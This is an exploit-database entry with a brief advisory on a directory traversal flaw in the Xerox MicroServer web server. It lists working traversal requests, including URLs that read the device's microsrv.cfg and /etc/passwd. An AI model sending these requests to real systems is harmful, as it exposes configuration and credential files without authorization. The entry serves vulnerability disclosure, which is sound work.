[] NeoSense

Xerox MicroServer - Web Server Directory Traversal

Author: J.A. Gutierrez
type: remote
platform: unix
port: 
date_added: 2003-12-19 
date_updated: 2012-12-17 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/9256/info

It has been reported that Xerox_MicroServer/Xerox11 may be prone to a directory traversal vulnerability that may allow an attacker to traverse outside the server root directory by using '/..' or '/.' character sequences at the end of a URL request.

GET /assist/..
GET /assist/////.././../../.
http://www.example.com////../../data/config/microsrv.cfg
http://www.example.com////////../../../../../../etc/passwd